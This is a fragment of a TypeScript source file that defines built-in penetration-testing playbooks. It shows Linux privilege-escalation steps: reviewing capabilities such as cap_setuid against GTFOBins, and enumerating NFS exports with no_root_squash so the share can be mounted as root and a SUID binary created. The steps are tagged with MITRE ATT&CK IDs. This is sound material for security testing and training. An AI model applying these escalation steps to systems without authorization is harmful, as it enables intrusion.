        'Notable caps: cap_setuid+ep, cap_net_raw+ep, cap_sys_admin+ep. Cross-reference with GTFOBins.', true, 'T1548', 'Abuse Elevation Control Mechanism', 'command'),
      step('pc-8', 8, 'Linux: NFS Shares', 'Check for NFS shares with no_root_squash that allow privilege escalation.', 'privesc',
        ['cat /etc/exports', 'showmount -e <target>'],
        'If no_root_squash is set, mount the share as root and create SUID binary.', false, 'T1039', 'Data from Network Shared Drive', 'verification'),
    ]
  },
]

export const BUILTIN_PLAYBOOKS: Playbook[] = [
  ...PENTEST_PLAYBOOKS,
  ...BUILTIN_CCNA_A,
  ...BUILTIN_CCNA_B,
]
